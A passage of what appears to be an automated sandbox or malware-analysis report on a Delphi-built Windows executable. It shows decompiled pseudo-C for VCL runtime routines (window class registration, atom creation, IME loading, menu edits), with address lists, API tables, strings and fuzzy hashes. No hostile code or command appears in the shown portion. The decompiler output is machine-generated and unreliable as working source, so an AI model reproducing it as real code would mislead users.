							goto L101;
						}
					}
					if(__eflags == 0) {
						_t297 = _v12;
						__eflags =  *(_t297 + 4);
						if( *(_t297 + 4) != 0) {
							E004040E8();
						}
						goto L102;
					}
					__eflags = _t161 - 0x14;
					if(_t161 > 0x14) {
						goto L101;
					}
					switch( *((intOrPtr*)(_t161 * 4 +  &M0044A698))) {
						case 0:
							0 = E00419668(0, __ebx, __edi, __esi);
							goto L102;
						case 1:
							goto L101;
						case 2:
							_push(0);
							_push(0);
							_push(0xb01a);
							_v8 =  *(_v8 + 0x30);
							_push( *(_v8 + 0x30));
							L00406974();
							__eax = E0044A56C(__ebp);
							goto L102;
						case 3:
							__eax = _v12;
							__eflags =  *(__eax + 4);
							if( *(__eax + 4) == 0) {
								__eax = E0044A56C(__ebp);
								__eax = _v8;
								__eflags =  *(__eax + 0xac);
								if( *(__eax + 0xac) == 0) {
									__eax = _v8;
									__eax =  *(_v8 + 0x30);
									__eax = E00442264( *(_v8 + 0x30), __ebx, __edi, __esi);
									__edx = _v8;
									 *(_v8 + 0xac) = __eax;
								}
								_v8 = L0044A404();
							} else {
								_v8 = E0044A40C(_v8);
								__eax = _v8;
								__eax =  *(_v8 + 0xac);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = _v8;
									__edx = 0;
									__eflags = 0;
									 *(_v8 + 0xac) = 0;
								}
								__eax = E0044A56C(__ebp);
							}
							goto L102;
						case 4:
							__eax = _v8;
							__eax =  *(_v8 + 0x30);
							_push(__eax);
							L004068E4();
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E0044A56C(__ebp);
							} else {
								__eax = E0044A5A8(__ebp);
							}
							goto L102;
						case 5:
							__eax = _v8;
							__eax =  *(_v8 + 0x44);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E00447C6C(__eax, __ecx);
							}
							goto L102;
						case 6:
							__eax = _v12;
							 *_v12 = 0x27;
							__eax = E0044A56C(__ebp);
							goto L102;
					}
				} else {
					_t314 = _t305 + 1;
					_t368 = 0;
					do {
						if( *((intOrPtr*)(E00413E68( *((intOrPtr*)(_v8 + 0xa8)), _t368)))() != 0) {
							_pop(_t362);
							 *[fs:eax] = _t362;
							return 0;
						}
						_t368 = _t368 + 1;
						_t314 = _t314 - 1;
						__eflags = _t314;
					} while (_t314 != 0);
					goto L5;
				}
			}

0x0044a5f4
0x0044a5fd
0x0044a600
0x0044a605
0x0044a606
0x0044a60b
0x0044a60e
0x0044a616
0x0044a625
0x0044a628
0x0044a65c
0x0044a662
0x0044a66a
0x0044a66c
0x0044a66e
0x0044a671
0x0044a725
0x0044a72a
0x0044a77b
0x0044a780
0x0044a7a1
0x0044a7a1
0x0044a7a6
0x0044ac13
0x0044ac16
0x0044ac1a
0x0044ac36
0x0044ac1c
0x0044ac28
0x0044ac28
0x0044aca1
0x0044aca3
0x0044aca6
0x00000000
0x0044aca6
0x0044a7af
0x0044a7b2
0x0044aa6e
0x0044a7b8
0x0044ac9a
0x0044ac9b
0x0044aca0
0x00000000
0x0044a7b2
0x0044a782
0x0044abda
0x0044abdd
0x0044abe1
0x0044ac09
0x0044abe3
0x0044abf1
0x0044abf1
0x00000000
0x0044abe1
0x0044a788
0x0044a788
0x0044a78d
0x0044ab88
0x0044ab8d
0x0044ab8f
0x0044ab95
0x0044ab9a
0x0044ab9d
0x0044aba0
0x0044aba8
0x0044abad
0x0044abaf
0x0044abb6
0x0044abb6
0x0044abaf
0x0044aba0
0x00000000
0x0044ab8f
0x0044a793
0x0044a796
0x0044abc0
0x0044abd0
0x00000000
0x0044a79c
0x00000000
0x0044a79c
0x0044a796
0x0044a72c
0x0044aa9b
0x0044aa9e
0x0044aaa0
0x0044aaa6
0x0044aaaa
0x0044aaaf
0x0044aab1
0x0044aabf
0x0044aac4
0x0044aac6
0x0044aad4
0x0044aad9
0x0044aadb
0x0044aae1
0x0044aae8
0x0044aaf7
0x0044ab10
0x0044ab16
0x0044ab1b
0x0044ab25
0x0044ab25
0x0044aadb
0x0044aac6
0x0044aab1
0x00000000
0x0044aaa0
0x0044a732
0x0044a737
0x0044a762
0x0044a762
0x0044a767
0x0044ab59
0x0044ab5c
0x0044ab64
0x0044ab76
0x0044ab76
0x00000000
0x0044ab64
0x0044a76d
0x0044a770
0x0044aa7c
0x0044aa81
0x0044aa83
0x0044aa8c
0x0044aa8c
0x00000000
0x0044a776
0x00000000
0x0044a776
0x0044a770
0x0044a739
0x0044ab31
0x0044ab34
0x0044ab3c
0x0044ab4e
0x0044ab4e
0x00000000
0x0044ab3c
0x0044a73f
0x0044a73f
0x0044a744
0x0044a7c8
0x0044a7c8
0x0044a7cd
0x0044a7db
0x0044a7cf
0x0044a7cf
0x0044a7d4
0x0044a7e8
0x0044a7d6
0x0044a7f3
0x0044a7f8
0x0044a7d4
0x00000000
0x0044a7cd
0x0044a749
0x0044a749
0x0044a74c
0x0044a980
0x00000000
0x0044a980
0x0044a752
0x0044a757
0x0044ac7c
0x0044ac81
0x0044ac83
0x0044ac8a
0x0044ac8a
0x00000000
0x0044a75d
0x00000000
0x0044a75d
0x0044a757
0x0044a677
0x00000000
0x00000000
0x0044a67d
0x0044a680
0x0044a6ec
0x0044a6ef
0x0044a70e
0x0044a70e
0x0044a711
0x0044a85e
0x00000000
0x0044a85e
0x0044a717
0x0044a71a
0x0044a99f
0x0044a9a5
0x0044a9ab
0x0044a9b1
0x0044a9b4
0x0044a9bb
0x0044a9c1
0x0044a9c4
0x0044a9cb
0x0044aa4d
0x0044a9cd
0x0044a9dc
0x0044a9e1
0x0044a9e7
0x0044a9e9
0x0044aa35
0x0044aa3d
0x0044a9eb
0x0044a9f0
0x0044aa07
0x0044aa09
0x0044aa0c
0x0044aa0e
0x0044aa17
0x0044aa25
0x0044aa25
0x0044aa0e
0x0044a9e9
0x0044a9cb
0x0044a9bb
0x00000000
0x0044a720
0x00000000
0x0044a720
0x0044a71a
0x0044a6f1
0x0044ac64
0x0044ac69
0x0044ac6f
0x00000000
0x0044ac74
0x0044a6f7
0x0044a6f7
0x0044a6fa
0x0044ac44
0x0044ac4b
0x0044ac56
0x0044ac5c
0x00000000
0x0044ac61
0x0044a700
0x0044a703
0x0044a888
0x0044a88e
0x0044a891
0x0044a895
0x0044a89b
0x0044a8a1
0x0044a8a4
0x0044a8a8
0x0044a8cf
0x0044a8e4
0x0044a8aa
0x0044a8ad
0x0044a8c2
0x0044a8c2
0x00000000
0x0044a709
0x00000000
0x0044a709
0x0044a703
0x0044a682
0x0044a988
0x0044a98b
0x0044a98f
0x0044a995
0x0044a995
0x00000000
0x0044a98f
0x0044a688
0x0044a68b
0x00000000
0x00000000
0x0044a691
0x00000000
0x0044ac93
0x00000000
0x00000000
0x00000000
0x00000000
0x0044a866
0x0044a868
0x0044a86a
0x0044a872
0x0044a875
0x0044a876
0x0044a87c
0x00000000
0x00000000
0x0044a8ee
0x0044a8f1
0x0044a8f5
0x0044a929
0x0044a92f
0x0044a932
0x0044a939
0x0044a93b
0x0044a93e
0x0044a941
0x0044a946
0x0044a949
0x0044a949
0x0044a952
0x0044a8f7
0x0044a8fa
0x0044a8ff
0x0044a902
0x0044a908
0x0044a90a
0x0044a911
0x0044a914
0x0044a914
0x0044a916
0x0044a916
0x0044a91d
0x0044a922
0x00000000
0x00000000
0x0044a816
0x0044a819
0x0044a81c
0x0044a81d
0x0044a822
0x0044a824
0x0044a833
0x0044a826
0x0044a827
0x0044a82c
0x00000000
0x00000000
0x0044a7fe
0x0044a801
0x0044a804
0x0044a806
0x0044a80c
0x0044a80c
0x00000000
0x00000000
0x0044a83e
0x0044a841
0x0044a848
0x00000000
0x00000000
0x0044a62a
0x0044a62a
0x0044a62b
0x0044a62d
0x0044a649
0x0044a64d
0x0044a650
0x00000000
0x0044a650
0x0044a658
0x0044a659
0x0044a659
0x0044a659
0x00000000
0x0044a62d

Strings

RegisterAutomation, xrefs: 0044A9F3
vcltest3.dll, xrefs: 0044A9D2

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID: RegisterAutomation$vcltest3.dll
API String ID: 0-2963190186
Opcode ID: dfaeb636a8e8e22a47af52abfbacdc4ec6991d271b28b2f830f381af54467704
Instruction ID: d87eb14d4ef7e58fa93488cbcb6b20c10af1f0403ce29b9ecefe0dc67f797670
Opcode Fuzzy Hash: dfaeb636a8e8e22a47af52abfbacdc4ec6991d271b28b2f830f381af54467704
Instruction Fuzzy Hash: 17E18134640204EFEB50DF69D585BAEB7F5EF48314F2481A6E8059B352C738EE61DB0A

Uniqueness

Uniqueness Score: -1.00%

Function 00437334, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00437334(void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t6;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t28;

				_t25 = __esi;
				_t17 = __ecx;
				_push(_t28);
				_push(0x4373ba);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				 *0x47bb04 =  *0x47bb04 - 1;
				if( *0x47bb04 < 0) {
					 *0x47bb00 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
					_t31 =  *0x47bb00;
					E00437100(_t16, __edi,  *0x47bb00);
					_t6 =  *0x427f24; // 0x427f70
					E004136A4(_t6, _t16, _t17,  *0x47bb00);
					_t8 =  *0x427f24; // 0x427f70
					E00413744(_t8, _t16, _t17, _t31);
					_t21 =  *0x427f24; // 0x427f70
					_t10 =  *0x4386d4; // 0x438720
					E004136F0(_t10, _t16, _t21, __esi, _t31);
					_t22 =  *0x427f24; // 0x427f70
					_t12 =  *0x4373c4; // 0x437410
					E004136F0(_t12, _t16, _t22, __esi, _t31);
					_t23 =  *0x427f24; // 0x427f70
					_t14 =  *0x4374e8; // 0x437534
					E004136F0(_t14, _t16, _t23, _t25, _t31);
				}
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x4373c1);
				return 0;
			}

0x00437334
0x00437334
0x00437339
0x0043733a
0x0043733f
0x00437342
0x00437345
0x0043734c
0x0043735c
0x0043735c
0x00437363
0x00437368
0x0043736d
0x00437372
0x00437377
0x0043737c
0x00437382
0x00437387
0x0043738c
0x00437392
0x00437397
0x0043739c
0x004373a2
0x004373a7
0x004373a7
0x004373ae
0x004373b1
0x004373b4
0x004373b9

APIs

GetVersion.KERNEL32(00000000,004373BA), ref: 0043734E

Part of subcall function 00437100: GetCurrentProcessId.KERNEL32(?,00000000,00437278), ref: 00437121
Part of subcall function 00437100: GlobalAddAtomA.KERNEL32(00000000), ref: 00437154
Part of subcall function 00437100: GetCurrentThreadId.KERNEL32 ref: 0043716F
Part of subcall function 00437100: GlobalAddAtomA.KERNEL32(00000000), ref: 004371A5
Part of subcall function 00437100: RegisterClipboardFormatA.USER32(00000000), ref: 004371BB
Part of subcall function 00437100: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,00437278), ref: 0043723F
Part of subcall function 00437100: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00437250

Strings

4uC, xrefs: 004373A2

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
String ID: 4uC
API String ID: 3775504709-1639844295
Opcode ID: b0e071625ee2c133da4dc3b4961ed60cd76ebcba108abacc6d4abdab5fd32a15
Instruction ID: e82bbe59acc8904bf0fbaf066ad8e119d518100e30ed9d54c2293709790727f4
Opcode Fuzzy Hash: b0e071625ee2c133da4dc3b4961ed60cd76ebcba108abacc6d4abdab5fd32a15
Instruction Fuzzy Hash: D8F04FB520C5409BC631EF2AEE5392577E8E74C30479154BAFD4043762CA78AC52DA9C

Uniqueness

Uniqueness Score: -1.00%

Function 0044A56C, Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0044A56C(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
				_push(_t26); // executed
				L0040668C(); // executed
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}

0x0044a578
0x0044a582
0x0044a58b
0x0044a592
0x0044a595
0x0044a596
0x0044a5a1
0x0044a5a5

APIs

NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 0044A596

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 25e5abac485f33f57cd8a93bd1c9b7b64e1a550050a37676b0de83a6e6b2d3e6
Instruction ID: 98d68a84a8c0b98390fd66d1092e039e29952e39b95ca993a05471481c520d49
Opcode Fuzzy Hash: 25e5abac485f33f57cd8a93bd1c9b7b64e1a550050a37676b0de83a6e6b2d3e6
Instruction Fuzzy Hash: B7F0C579205608AFCB40DF9DC588D4AFBE8BB4C260B058695BD88CB321C235FD808F94

Uniqueness

Uniqueness Score: -1.00%

Function 00437100, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00437100(void* __ebx, void* __edi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				char _t29;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t53;
				struct HINSTANCE__* _t63;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr _t83;
				void* _t87;

				_v20 = 0;
				_v8 = 0;
				_push(_t87);
				_push(0x437278);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe0;
				_v16 = GetCurrentProcessId();
				_v12 = 0;
				E00408D4C("Delphi%.8X", 0,  &_v16,  &_v8);
				E00404234(0x47bb0c, _v8);
				_t25 =  *0x47bb0c; // 0x232126c
				 *0x47bb08 = GlobalAddAtomA(E004046A0(_t25));
				_t29 =  *0x47b660; // 0x400000
				_v36 = _t29;
				_v32 = 0;
				_v28 = GetCurrentThreadId();
				_v24 = 0;
				E00408D4C("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
				E00404234(0x47bb10, _v20);
				_t35 =  *0x47bb10; // 0x2321288
				 *0x47bb0a = GlobalAddAtomA(E004046A0(_t35));
				_t38 =  *0x47bb10; // 0x2321288
				 *0x47bb14 = RegisterClipboardFormatA(E004046A0(_t38));
				 *0x47bb4c = E0041407C(1);
				E00436D04();
				 *0x47bafc = E00436B2C(1, 1);
				_t47 = E00448C44(1, __edi);
				_t78 =  *0x47a0fc; // 0x47bba0
				 *_t78 = _t47;
				_t49 = E00449D58(0, 1);
				_t80 =  *0x479fc4; // 0x47bb9c
				 *_t80 = _t49;
				_t50 =  *0x479fc4; // 0x47bb9c
				E0044B88C( *_t50, 1);
				_t53 =  *0x426f5c; // 0x426f60
				E00413830(_t53, 0x429058, 0x429068);
				_t63 = GetModuleHandleA("USER32");
				if(_t63 != 0) {
					 *0x479958 = GetProcAddress(_t63, "AnimateWindow");
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(0x43727f);
				E004041E0( &_v20);
				return E004041E0( &_v8);
			}

0x00437109
0x0043710c
0x00437111
0x00437112
0x00437117
0x0043711a
0x00437126
0x00437129
0x00437137
0x00437144
0x00437149
0x00437159
0x00437163
0x00437168
0x0043716b
0x00437174
0x00437177
0x00437188
0x00437195
0x0043719a
0x004371aa
0x004371b0
0x004371c0
0x004371d1
0x004371d6
0x004371e7
0x004371f5
0x004371fa
0x00437200
0x0043720b
0x00437210
0x00437216
0x00437218
0x00437221
0x00437230
0x00437235
0x00437244
0x00437248
0x00437255
0x00437255
0x0043725c
0x0043725f
0x00437262
0x0043726a
0x00437277

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00437278), ref: 00437121
GlobalAddAtomA.KERNEL32(00000000), ref: 00437154
GetCurrentThreadId.KERNEL32 ref: 0043716F
GlobalAddAtomA.KERNEL32(00000000), ref: 004371A5
RegisterClipboardFormatA.USER32(00000000), ref: 004371BB

Part of subcall function 0041407C: RtlInitializeCriticalSection.NTDLL(00411BB8), ref: 0041409B

Part of subcall function 00436D04: SetErrorMode.KERNEL32(00008000), ref: 00436D1D
Part of subcall function 00436D04: GetModuleHandleA.KERNEL32(USER32,00000000,00436E6A,?,00008000), ref: 00436D41
Part of subcall function 00436D04: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00436D4E
Part of subcall function 00436D04: LoadLibraryA.KERNEL32(imm32.dll,00000000,00436E6A,?,00008000), ref: 00436D6A
Part of subcall function 00436D04: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00436D8C
Part of subcall function 00436D04: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00436DA1
Part of subcall function 00436D04: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00436DB6
Part of subcall function 00436D04: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00436DCB
Part of subcall function 00436D04: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00436DE0
Part of subcall function 00436D04: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00436DF5
Part of subcall function 00436D04: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 00436E0A
Part of subcall function 00436D04: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 00436E1F
Part of subcall function 00436D04: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00436E34
Part of subcall function 00436D04: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00436E49
Part of subcall function 00436D04: SetErrorMode.KERNEL32(?,00436E71,00008000), ref: 00436E64

Part of subcall function 00448C44: GetKeyboardLayout.USER32(00000000), ref: 00448C89
Part of subcall function 00448C44: 72E7AC50.USER32(00000000,?,?,00000000,?,004371FA,00000000,00000000,?,?,00000000,00437278), ref: 00448CDE

Part of subcall function 00449D58: LoadIconA.USER32(00400000,MAINICON), ref: 00449E3D
Part of subcall function 00449D58: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00437210,00000000,00000000,?,?,00000000,00437278), ref: 00449E6F
Part of subcall function 00449D58: OemToCharA.USER32(?,?), ref: 00449E82
Part of subcall function 00449D58: CharNextA.USER32(?,00400000,?,00000100,?,?,?,00437210,00000000,00000000,?,?,00000000,00437278), ref: 00449ECF
Part of subcall function 00449D58: CharLowerA.USER32(00000000,?,00400000,?,00000100,?,?,?,00437210,00000000,00000000,?,?,00000000,00437278), ref: 00449ED5

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,00437278), ref: 0043723F
GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00437250

Strings

`oB, xrefs: 00437230
ControlOfs%.8X%.8X, xrefs: 00437183
USER32, xrefs: 0043723A
Delphi%.8X, xrefs: 00437132
AnimateWindow, xrefs: 0043724A

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: AddressProc$CharModule$AtomCurrentErrorGlobalHandleLoadMode$ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameNextProcessRegisterSectionThread
String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32$`oB
API String ID: 3690044937-1005833924
Opcode ID: 5146434fdfbdc4460dad9b57f6a2d0fa7fa6e701714123dfc8f3f75c23661093
Instruction ID: 981530912e79286a959191c2dbf15e9e1924a0dbe368cfb6ab4586b50bd09b6e
Opcode Fuzzy Hash: 5146434fdfbdc4460dad9b57f6a2d0fa7fa6e701714123dfc8f3f75c23661093
Instruction Fuzzy Hash: 3F4181B06042448BCB00EFA5D882A8D77E5EB49304B50847EF904E7395DB3DA940CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0044A074, Relevance: 13.6, APIs: 9, Instructions: 132
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0044A074(void* __eax, void* __ebx, void* __ecx) {
				struct _WNDCLASSA _v44;
				char _v48;
				char* _t22;
				long _t23;
				CHAR* _t26;
				struct HINSTANCE__* _t27;
				intOrPtr* _t29;
				signed int _t32;
				intOrPtr* _t33;
				signed int _t36;
				struct HINSTANCE__* _t37;
				void* _t39;
				CHAR* _t40;
				struct HWND__* _t41;
				char* _t47;
				char* _t52;
				long _t55;
				long _t59;
				struct HINSTANCE__* _t62;
				intOrPtr _t64;
				void* _t69;
				struct HMENU__* _t70;
				void* _t71;
				intOrPtr _t77;
				void* _t83;
				short _t88;

				_t71 = __ecx;
				_v48 = 0;
				_t69 = __eax;
				_push(_t83);
				_push(0x44a215);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83 + 0xffffffd4;
				if( *((char*)(__eax + 0xa4)) != 0) {
					L13:
					_pop(_t77);
					 *[fs:eax] = _t77;
					_push(0x44a21c);
					return E004041E0( &_v48);
				}
				_t22 =  *0x47a020; // 0x47b044
				if( *_t22 != 0) {
					goto L13;
				}
				_t23 = E0041A898(E0044A5F4, __eax); // executed
				 *(_t69 + 0x40) = _t23;
				 *0x479c90 = L0040668C;
				_t26 =  *0x479cb0; // 0x449d48
				_t27 =  *0x47b660; // 0x400000
				if(GetClassInfoA(_t27, _t26,  &_v44) == 0) {
					_t62 =  *0x47b660; // 0x400000
					 *0x479c9c = _t62;
					_t88 = RegisterClassA(0x479c8c);
					if(_t88 == 0) {
						_t64 =  *0x479dd8; // 0x41abd4
						E00405DCC(_t64, _t71,  &_v48);
						E0040B61C(_v48, 1);
						E00403BF4();
					}
				}
				_t29 =  *0x479e84; // 0x47b910
				_t32 =  *((intOrPtr*)( *_t29))(0) >> 1;
				if(_t88 < 0) {
					asm("adc eax, 0x0");
				}
				_t33 =  *0x479e84; // 0x47b910
				_t36 =  *((intOrPtr*)( *_t33))(1, _t32) >> 1;
				if(_t88 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t36);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t37 =  *0x47b660; // 0x400000
				_push(_t37);
				_push(0);
				_t7 = _t69 + 0x8c; // 0x28300044
				_t39 = E004046A0( *_t7);
				_t40 =  *0x479cb0; // 0x449d48, executed
				_t41 = E00406BE4(_t40, _t39); // executed
				 *(_t69 + 0x30) = _t41;
				_t9 = _t69 + 0x8c; // 0x442168
				E004041E0(_t9);
				 *((char*)(_t69 + 0xa4)) = 1;
				_t11 = _t69 + 0x40; // 0x10940000
				_t12 = _t69 + 0x30; // 0xe
				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
				_t47 =  *0x479efc; // 0x47bb00
				if( *_t47 != 0) {
					_t55 = E0044ACF4(_t69);
					_t13 = _t69 + 0x30; // 0xe
					SendMessageA( *_t13, 0x80, 1, _t55); // executed
					_t59 = E0044ACF4(_t69);
					_t14 = _t69 + 0x30; // 0xe
					SetClassLongA( *_t14, 0xfffffff2, _t59);
				}
				_t15 = _t69 + 0x30; // 0xe
				_t70 = GetSystemMenu( *_t15, 0);
				DeleteMenu(_t70, 0xf030, 0);
				DeleteMenu(_t70, 0xf000, 0);
				_t52 =  *0x479efc; // 0x47bb00
				if( *_t52 != 0) {
					DeleteMenu(_t70, 0xf010, 0);
				}
				goto L13;
			}

0x0044a074
0x0044a07d
0x0044a080
0x0044a084
0x0044a085
0x0044a08a
0x0044a08d
0x0044a097
0x0044a1ff
0x0044a201
0x0044a204
0x0044a207
0x0044a214
0x0044a214
0x0044a09d
0x0044a0a5
0x00000000
0x00000000
0x0044a0b1
0x0044a0b6
0x0044a0be
0x0044a0c7
0x0044a0cd
0x0044a0da
0x0044a0dc
0x0044a0e1
0x0044a0f0
0x0044a0f3
0x0044a0f8
0x0044a0fd
0x0044a10c
0x0044a111
0x0044a111
0x0044a0f3
0x0044a118
0x0044a121
0x0044a123
0x0044a125
0x0044a125
0x0044a12b
0x0044a134
0x0044a136
0x0044a138
0x0044a138
0x0044a13b
0x0044a13c
0x0044a13e
0x0044a140
0x0044a142
0x0044a144
0x0044a149
0x0044a14a
0x0044a14c
0x0044a152
0x0044a15e
0x0044a163
0x0044a168
0x0044a16b
0x0044a171
0x0044a176
0x0044a17d
0x0044a183
0x0044a187
0x0044a18c
0x0044a194
0x0044a198
0x0044a1a5
0x0044a1a9
0x0044a1b0
0x0044a1b8
0x0044a1bc
0x0044a1bc
0x0044a1c3
0x0044a1cc
0x0044a1d6
0x0044a1e3
0x0044a1e8
0x0044a1f0
0x0044a1fa
0x0044a1fa
0x00000000

APIs

Part of subcall function 0041A898: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041A8B6

GetClassInfoA.USER32(00400000,00449D48,?), ref: 0044A0D3
RegisterClassA.USER32(00479C8C), ref: 0044A0EB

Part of subcall function 00405DCC: LoadStringA.USER32(00000000,00010000,?,00001000), ref: 00405DFE

SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 0044A187
SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 0044A1A9
SetClassLongA.USER32(0000000E,000000F2,00000000), ref: 0044A1BC
GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,004420DC), ref: 0044A1C7
DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,004420DC), ref: 0044A1D6
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,004420DC), ref: 0044A1E3
DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,004420DC), ref: 0044A1FA

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
String ID:
API String ID: 2103932818-0
Opcode ID: cb45d6e5f26240e71ca7a80016a499d2fac44638ba6d11600755cc0c7f2c70e9
Instruction ID: 59908207186d0517ff517afd40f6d34d13d899750b49cff9de71474d83d32dee
Opcode Fuzzy Hash: cb45d6e5f26240e71ca7a80016a499d2fac44638ba6d11600755cc0c7f2c70e9
Instruction Fuzzy Hash: A14156717402406FEB11EF69DC82F6637E8AB44708F154476F905EF2E2DAB9AC90872D

Uniqueness

Uniqueness Score: -1.00%

Function 00449D58, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00449D58(void* __ecx, char __edx) {
				char _v5;
				char* _v12;
				char _v268;
				void* __ebx;
				void* __ebp;
				intOrPtr _t44;
				intOrPtr _t47;
				intOrPtr _t48;
				struct HINSTANCE__** _t58;
				intOrPtr _t63;
				struct HINSTANCE__** _t65;
				CHAR* _t76;
				char* _t80;
				intOrPtr _t86;
				intOrPtr* _t94;
				intOrPtr* _t95;
				intOrPtr _t96;
